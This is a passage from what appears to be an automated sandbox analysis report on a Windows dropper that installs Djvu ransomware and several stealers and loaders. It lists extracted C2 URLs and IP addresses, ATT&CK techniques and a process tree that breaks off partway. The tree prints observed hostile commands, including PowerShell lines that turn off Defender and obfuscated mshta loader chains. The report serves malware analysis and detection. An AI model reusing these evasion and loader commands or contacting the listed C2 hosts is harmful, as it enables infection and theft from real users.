djvu | 64506751e65ec41605c04620d393cdf9338ce76d31d8b0868dbdfce88f086a03

Resubmissions

10/11/2021, 14:50

211110-r7nbvaeddr 10

08/11/2021, 16:12

211108-tnmmbahgaj 10

08/11/2021, 15:26

211108-svdsbaccf6 10

08/11/2021, 14:48

211108-r6lfvshdfn 10

Analysis

max time kernel
43s
max time network
781s
platform
windows10_x64
resource
win10-en-20211104
submitted
08/11/2021, 15:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.efxety.top/

Extracted

Family

raccoon

Botnet

2f2ad1a1aa093c5a9d17040c8efd5650a99640b5

Attributes

url4cnc
http://telegatt.top/oh12manymarty

http://telegka.top/oh12manymarty

http://telegin.top/oh12manymarty

https://t.me/oh12manymarty

rc4.plain

Extracted

Family

redline

Botnet

media18

91.121.67.60:2151

Extracted

Family

redline

Botnet

fucker2

135.181.129.119:4805

Extracted

Family

redline

Botnet

Chris

194.104.136.5:46013

Extracted

Family

smokeloader

Version

2020

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/

rc4.i32

Extracted

Family

vidar

Version

47.9

Botnet

937

https://mas.to/@kirpich

Attributes

profile_id
937

Extracted

Family

xloader

Version

2.5

Campaign

s0iw

http://www.kyiejenner.com/s0iw/

Decoy

ortopediamodelo.com

orimshirts.store

universecatholicweekly.info

yvettechan.com

sersaudavelsempre.online

face-booking.net

europeanretailgroup.com

umofan.com

roemahbajumuslim.online

joyrosecuisine.net

3dmaker.house

megdb.xyz

stereoshopie.info

gv5rm.com

tdc-trust.com

mcglobal.club

choral.works

onlineconsultantgroup.com

friscopaintandbody.com

midwestii.com

Signatures

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 6 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4676	4476	rundll32.exe	121
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6168	4476	rundll32.exe	121
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8048	4476	rundll32.exe	121
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5896	4476	rundll32.exe	121
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	10112	4476	rundll32.exe	121
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	10152	4476	rundll32.exe	121

Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 8 IoCs

resource	yara_rule
behavioral5/memory/2020-257-0x000000000041B242-mapping.dmp	family_redline
behavioral5/memory/3208-259-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral5/memory/3208-264-0x000000000041B23E-mapping.dmp	family_redline
behavioral5/memory/1420-263-0x000000000041B23E-mapping.dmp	family_redline
behavioral5/memory/1420-258-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral5/memory/2020-256-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral5/memory/2020-292-0x0000000004C80000-0x0000000005286000-memory.dmp	family_redline
behavioral5/memory/1420-294-0x0000000004ED0000-0x00000000054D6000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

resource	yara_rule
behavioral5/files/0x000600000001abd4-197.dat	family_socelars
behavioral5/files/0x000600000001abd4-219.dat	family_socelars

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4424 created 2144	4424	WerFault.exe	102

Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Xloader
Xloader is a rebranded version of Formbook malware.
loader xloader

Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral5/memory/4788-536-0x00000000021F0000-0x00000000022C6000-memory.dmp	family_vidar
behavioral5/memory/4788-538-0x0000000000400000-0x00000000004D9000-memory.dmp	family_vidar

Xloader Payload 1 IoCs

rat

resource	yara_rule
behavioral5/memory/5152-561-0x0000000002930000-0x0000000002959000-memory.dmp	xloader

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral5/files/0x000600000001abb4-128.dat	aspack_v212_v242
behavioral5/files/0x000600000001abb4-127.dat	aspack_v212_v242
behavioral5/files/0x000400000001abc6-126.dat	aspack_v212_v242
behavioral5/files/0x000400000001abc6-131.dat	aspack_v212_v242
behavioral5/files/0x000400000001abc8-132.dat	aspack_v212_v242
behavioral5/files/0x000400000001abc8-133.dat	aspack_v212_v242

Blocklisted process makes network request 1 IoCs

flow	pid	Process
63	3184	msiexec.exe

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 25 IoCs

pid	Process
2836	setup_installer.exe
288	setup_install.exe
3184	Tue2082eedf21.exe
788	Tue200ab8d408d.exe
3372	Tue20adee3c26d.exe
2096	Tue201d50e7015.exe
2144	Tue20d8f1968de62f282.exe
1220	Tue2076b72c2666aa9c.exe
1524	Tue202dc71d1d41.exe
2148	Tue20ea834764a6.exe
3068	Tue2082ea84bd.exe
2136	Tue207c76c7f37.exe
2432	Tue20abd30733a17.exe
3048	Tue203dd57461.exe
3004	Tue20c79bfdadc.exe
2848	Tue2095db5b6bd7.exe
2124	Tue201d50e7015.tmp
1124	Tue205724605816e79.exe
2020	Tue2082ea84bd.exe
1420	Tue20c79bfdadc.exe
3208	Tue207c76c7f37.exe
2688	Tue201d50e7015.exe
600	Tue201d50e7015.tmp
4132	1863108.exe
4368	8864439.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\International\Geo\Nation	Tue2076b72c2666aa9c.exe

Loads dropped DLL 7 IoCs

pid	Process
288	setup_install.exe
288	setup_install.exe
288	setup_install.exe
288	setup_install.exe
288	setup_install.exe
2124	Tue201d50e7015.tmp
600	Tue201d50e7015.tmp

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5388	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 15 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
238	ipinfo.io
288	ipinfo.io
403	ipinfo.io
55	ipinfo.io
57	ip-api.com
289	ipinfo.io
483	ipinfo.io
2864	api.2ip.ua
2890	api.2ip.ua
64	ipinfo.io
804	ipinfo.io
805	ipinfo.io
3732	api.2ip.ua
56	ipinfo.io
404	ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 3068 set thread context of 2020	3068	Tue2082ea84bd.exe	109
PID 3004 set thread context of 1420	3004	Tue20c79bfdadc.exe	111
PID 2136 set thread context of 3208	2136	Tue207c76c7f37.exe	110

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 5 IoCs

pid	pid_target	Process	procid_target
3524	288	WerFault.exe	69
4424	2144	WerFault.exe	102
5368	5276	WerFault.exe	142
1044	5328	WerFault.exe	164
2568	4788	WerFault.exe	133

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue205724605816e79.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue205724605816e79.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue205724605816e79.exe

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
5080	schtasks.exe
4820	schtasks.exe
6348	schtasks.exe
6328	schtasks.exe
3048	schtasks.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
5312	timeout.exe
5984	timeout.exe
6044	timeout.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
12924	ipconfig.exe

Kills process with taskkill 17 IoCs

evasion

pid	Process
7012	taskkill.exe
7312	taskkill.exe
7720	taskkill.exe
9312	taskkill.exe
5304	taskkill.exe
5708	taskkill.exe
7156	taskkill.exe
4416	taskkill.exe
7036	taskkill.exe
11736	taskkill.exe
6688	taskkill.exe
7812	taskkill.exe
7288	taskkill.exe
5000	taskkill.exe
2900	taskkill.exe
6756	taskkill.exe
7212	taskkill.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
11448	PING.EXE
7312	PING.EXE
12956	PING.EXE

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	27	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3524	WerFault.exe
3524	WerFault.exe
3524	WerFault.exe
3524	WerFault.exe
3524	WerFault.exe
3524	WerFault.exe
3524	WerFault.exe
3524	WerFault.exe
3524	WerFault.exe
3524	WerFault.exe
3524	WerFault.exe
3524	WerFault.exe
3524	WerFault.exe
3524	WerFault.exe
3524	WerFault.exe
3524	WerFault.exe
3524	WerFault.exe
3524	WerFault.exe
3524	WerFault.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
1124	Tue205724605816e79.exe
1124	Tue205724605816e79.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe
1220	Tue2076b72c2666aa9c.exe

Suspicious use of AdjustPrivilegeToken 41 IoCs

description	pid	Process
Token: SeDebugPrivilege	2432	Tue20abd30733a17.exe
Token: SeCreateTokenPrivilege	2848	Tue2095db5b6bd7.exe
Token: SeAssignPrimaryTokenPrivilege	2848	Tue2095db5b6bd7.exe
Token: SeLockMemoryPrivilege	2848	Tue2095db5b6bd7.exe
Token: SeIncreaseQuotaPrivilege	2848	Tue2095db5b6bd7.exe
Token: SeMachineAccountPrivilege	2848	Tue2095db5b6bd7.exe
Token: SeTcbPrivilege	2848	Tue2095db5b6bd7.exe
Token: SeSecurityPrivilege	2848	Tue2095db5b6bd7.exe
Token: SeTakeOwnershipPrivilege	2848	Tue2095db5b6bd7.exe
Token: SeLoadDriverPrivilege	2848	Tue2095db5b6bd7.exe
Token: SeSystemProfilePrivilege	2848	Tue2095db5b6bd7.exe
Token: SeSystemtimePrivilege	2848	Tue2095db5b6bd7.exe
Token: SeProfSingleProcessPrivilege	2848	Tue2095db5b6bd7.exe
Token: SeIncBasePriorityPrivilege	2848	Tue2095db5b6bd7.exe
Token: SeCreatePagefilePrivilege	2848	Tue2095db5b6bd7.exe
Token: SeCreatePermanentPrivilege	2848	Tue2095db5b6bd7.exe
Token: SeBackupPrivilege	2848	Tue2095db5b6bd7.exe
Token: SeRestorePrivilege	2848	Tue2095db5b6bd7.exe
Token: SeShutdownPrivilege	2848	Tue2095db5b6bd7.exe
Token: SeDebugPrivilege	2848	Tue2095db5b6bd7.exe
Token: SeAuditPrivilege	2848	Tue2095db5b6bd7.exe
Token: SeSystemEnvironmentPrivilege	2848	Tue2095db5b6bd7.exe
Token: SeChangeNotifyPrivilege	2848	Tue2095db5b6bd7.exe
Token: SeRemoteShutdownPrivilege	2848	Tue2095db5b6bd7.exe
Token: SeUndockPrivilege	2848	Tue2095db5b6bd7.exe
Token: SeSyncAgentPrivilege	2848	Tue2095db5b6bd7.exe
Token: SeEnableDelegationPrivilege	2848	Tue2095db5b6bd7.exe
Token: SeManageVolumePrivilege	2848	Tue2095db5b6bd7.exe
Token: SeImpersonatePrivilege	2848	Tue2095db5b6bd7.exe
Token: SeCreateGlobalPrivilege	2848	Tue2095db5b6bd7.exe
Token: 31	2848	Tue2095db5b6bd7.exe
Token: 32	2848	Tue2095db5b6bd7.exe
Token: 33	2848	Tue2095db5b6bd7.exe
Token: 34	2848	Tue2095db5b6bd7.exe
Token: 35	2848	Tue2095db5b6bd7.exe
Token: SeRestorePrivilege	3524	WerFault.exe
Token: SeBackupPrivilege	3524	WerFault.exe
Token: SeDebugPrivilege	3048	schtasks.exe
Token: SeDebugPrivilege	3524	WerFault.exe
Token: SeDebugPrivilege	1160	powershell.exe
Token: SeDebugPrivilege	4424	WerFault.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2576 wrote to memory of 2836	2576	a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe	68
PID 2576 wrote to memory of 2836	2576	a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe	68
PID 2576 wrote to memory of 2836	2576	a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe	68
PID 2836 wrote to memory of 288	2836	setup_installer.exe	69
PID 2836 wrote to memory of 288	2836	setup_installer.exe	69
PID 2836 wrote to memory of 288	2836	setup_installer.exe	69
PID 288 wrote to memory of 1688	288	setup_install.exe	72
PID 288 wrote to memory of 1688	288	setup_install.exe	72
PID 288 wrote to memory of 1688	288	setup_install.exe	72
PID 288 wrote to memory of 3976	288	setup_install.exe	73
PID 288 wrote to memory of 3976	288	setup_install.exe	73
PID 288 wrote to memory of 3976	288	setup_install.exe	73
PID 288 wrote to memory of 3056	288	setup_install.exe	74
PID 288 wrote to memory of 3056	288	setup_install.exe	74
PID 288 wrote to memory of 3056	288	setup_install.exe	74
PID 288 wrote to memory of 2720	288	setup_install.exe	75
PID 288 wrote to memory of 2720	288	setup_install.exe	75
PID 288 wrote to memory of 2720	288	setup_install.exe	75
PID 288 wrote to memory of 2696	288	setup_install.exe	77
PID 288 wrote to memory of 2696	288	setup_install.exe	77
PID 288 wrote to memory of 2696	288	setup_install.exe	77
PID 1688 wrote to memory of 1160	1688	cmd.exe	76
PID 1688 wrote to memory of 1160	1688	cmd.exe	76
PID 1688 wrote to memory of 1160	1688	cmd.exe	76
PID 3976 wrote to memory of 1364	3976	cmd.exe	81
PID 3976 wrote to memory of 1364	3976	cmd.exe	81
PID 3976 wrote to memory of 1364	3976	cmd.exe	81
PID 288 wrote to memory of 4088	288	setup_install.exe	78
PID 288 wrote to memory of 4088	288	setup_install.exe	78
PID 288 wrote to memory of 4088	288	setup_install.exe	78
PID 288 wrote to memory of 1172	288	setup_install.exe	80
PID 288 wrote to memory of 1172	288	setup_install.exe	80
PID 288 wrote to memory of 1172	288	setup_install.exe	80
PID 288 wrote to memory of 680	288	setup_install.exe	79
PID 288 wrote to memory of 680	288	setup_install.exe	79
PID 288 wrote to memory of 680	288	setup_install.exe	79
PID 288 wrote to memory of 1128	288	setup_install.exe	82
PID 288 wrote to memory of 1128	288	setup_install.exe	82
PID 288 wrote to memory of 1128	288	setup_install.exe	82
PID 288 wrote to memory of 1084	288	setup_install.exe	84
PID 288 wrote to memory of 1084	288	setup_install.exe	84
PID 288 wrote to memory of 1084	288	setup_install.exe	84
PID 288 wrote to memory of 672	288	setup_install.exe	83
PID 288 wrote to memory of 672	288	setup_install.exe	83
PID 288 wrote to memory of 672	288	setup_install.exe	83
PID 2696 wrote to memory of 3184	2696	cmd.exe	87
PID 2696 wrote to memory of 3184	2696	cmd.exe	87
PID 2696 wrote to memory of 3184	2696	cmd.exe	87
PID 288 wrote to memory of 3376	288	setup_install.exe	86
PID 288 wrote to memory of 3376	288	setup_install.exe	86
PID 288 wrote to memory of 3376	288	setup_install.exe	86
PID 3056 wrote to memory of 788	3056	cmd.exe	85
PID 3056 wrote to memory of 788	3056	cmd.exe	85
PID 3056 wrote to memory of 788	3056	cmd.exe	85
PID 288 wrote to memory of 868	288	setup_install.exe	88
PID 288 wrote to memory of 868	288	setup_install.exe	88
PID 288 wrote to memory of 868	288	setup_install.exe	88
PID 288 wrote to memory of 1944	288	setup_install.exe	108
PID 288 wrote to memory of 1944	288	setup_install.exe	108
PID 288 wrote to memory of 1944	288	setup_install.exe	108
PID 1172 wrote to memory of 3372	1172	cmd.exe	107
PID 1172 wrote to memory of 3372	1172	cmd.exe	107
PID 1172 wrote to memory of 3372	1172	cmd.exe	107
PID 2720 wrote to memory of 2096	2720	cmd.exe	103

C:\Users\Admin\AppData\Local\Temp\a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
"C:\Users\Admin\AppData\Local\Temp\a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2576
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2836
- - C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:288
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1688
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1160
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3976
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        
        PID:1364
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue200ab8d408d.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3056
    - - C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue200ab8d408d.exe
        
        Tue200ab8d408d.exe
        5⤵
        Executes dropped EXE
        
        PID:788
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue201d50e7015.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2720
    - - C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue201d50e7015.exe
        
        Tue201d50e7015.exe
        5⤵
        Executes dropped EXE
        
        PID:2096
      - C:\Users\Admin\AppData\Local\Temp\is-ORQMS.tmp\Tue201d50e7015.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-ORQMS.tmp\Tue201d50e7015.tmp" /SL5="$40148,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue201d50e7015.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2124
        
        C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue201d50e7015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue201d50e7015.exe" /SILENT
        7⤵
        Executes dropped EXE
        
        PID:2688
        
        C:\Users\Admin\AppData\Local\Temp\is-HAO73.tmp\Tue201d50e7015.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-HAO73.tmp\Tue201d50e7015.tmp" /SL5="$101FE,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue201d50e7015.exe" /SILENT
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:600
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue2082eedf21.exe /mixone
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2696
    - - C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue2082eedf21.exe
        
        Tue2082eedf21.exe /mixone
        5⤵
        Executes dropped EXE
        
        PID:3184
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "Tue2082eedf21.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue2082eedf21.exe" & exit
        6⤵
        
        PID:4844
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "Tue2082eedf21.exe" /f
        7⤵
        Kills process with taskkill
        
        PID:4416
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue207c76c7f37.exe
      4⤵
      PID:4088
    - - C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue207c76c7f37.exe
        
        Tue207c76c7f37.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2136
      - C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue207c76c7f37.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue207c76c7f37.exe
        6⤵
        Executes dropped EXE
        
        PID:3208
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue20ea834764a6.exe
      4⤵
      PID:680
    - - C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue20ea834764a6.exe
        
        Tue20ea834764a6.exe
        5⤵
        Executes dropped EXE
        
        PID:2148
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue20adee3c26d.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1172
    - - C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue20adee3c26d.exe
        
        Tue20adee3c26d.exe
        5⤵
        Executes dropped EXE
        
        PID:3372
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBScRiPt: cLOsE(CREaTeOBject ("WSCRipt.sHEll" ). Run ( "CMd /r tYpE ""C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue20adee3c26d.exe"" > ..\_4SO.EXE &&sTARt ..\_4SO.Exe /PZOIMJIYi~u3pALhs & If """"== """" for %Y In ( ""C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue20adee3c26d.exe"") do taskkill /IM ""%~nXY"" -f" , 0, tRUE ) )
        6⤵
        
        PID:2240
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /r tYpE "C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue20adee3c26d.exe" >..\_4SO.EXE &&sTARt ..\_4SO.Exe /PZOIMJIYi~u3pALhs& If ""== "" for %Y In ( "C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue20adee3c26d.exe") do taskkill /IM "%~nXY" -f
        7⤵
        
        PID:4252
        
        C:\Users\Admin\AppData\Local\Temp\_4SO.EXE
        
        ..\_4SO.Exe /PZOIMJIYi~u3pALhs
        8⤵
        
        PID:4760
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBScRiPt: cLOsE(CREaTeOBject ("WSCRipt.sHEll" ). Run ( "CMd /r tYpE ""C:\Users\Admin\AppData\Local\Temp\_4SO.EXE"" > ..\_4SO.EXE &&sTARt ..\_4SO.Exe /PZOIMJIYi~u3pALhs & If ""/PZOIMJIYi~u3pALhs""== """" for %Y In ( ""C:\Users\Admin\AppData\Local\Temp\_4SO.EXE"") do taskkill /IM ""%~nXY"" -f" , 0, tRUE ) )
        9⤵
        
        PID:2812
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /r tYpE "C:\Users\Admin\AppData\Local\Temp\_4SO.EXE" >..\_4SO.EXE &&sTARt ..\_4SO.Exe /PZOIMJIYi~u3pALhs& If "/PZOIMJIYi~u3pALhs"== "" for %Y In ( "C:\Users\Admin\AppData\Local\Temp\_4SO.EXE") do taskkill /IM "%~nXY" -f
        10⤵
        
        PID:2400
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBsCripT: clOsE ( crEatEobJECT( "WSCRIPt.SHELL" ).RUn( "cMD.exE /q /C ecHo | SET /p = ""MZ"" >5~XZ.D & COpy /y /b 5~xz.D + LaXZ3lI.UF+ 53Bv.3un +3B8VN.JpX ..\WOYVBNM.9 & stArt msiexec -y ..\WOYVBnm.9 & dEL /Q * " , 0 ,tRue ) )
        9⤵
        
        PID:5340
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /C ecHo | SET /p = "MZ" >5~XZ.D&COpy /y /b 5~xz.D + LaXZ3lI.UF+ 53Bv.3un+3B8VN.JpX ..\WOYVBNM.9 & stArt msiexec -y ..\WOYVBnm.9 & dEL /Q *
        10⤵
        
        PID:4624
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ecHo "
        11⤵
        
        PID:6960
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SET /p = "MZ" 1>5~XZ.D"
        11⤵
        
        PID:6516
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec -y ..\WOYVBnm.9
        11⤵
        Blocklisted process makes network request
        
        PID:3184
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /IM "Tue20adee3c26d.exe" -f
        8⤵
        Kills process with taskkill
        
        PID:2900
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue20abd30733a17.exe
      4⤵
      PID:1128
    - - C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue20abd30733a17.exe
        
        Tue20abd30733a17.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2432
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue202dc71d1d41.exe
      4⤵
      PID:672
    - - C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue202dc71d1d41.exe
        
        Tue202dc71d1d41.exe
        5⤵
        Executes dropped EXE
        
        PID:1524
      - C:\Users\Admin\Pictures\Adobe Films\IwDAYwqZysps1bzLhOzyWmo3.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\IwDAYwqZysps1bzLhOzyWmo3.exe"
        6⤵
        
        PID:5064
      - C:\Users\Admin\Pictures\Adobe Films\KOU3bQITrVQ9_cBcqyutPh3v.exe
        
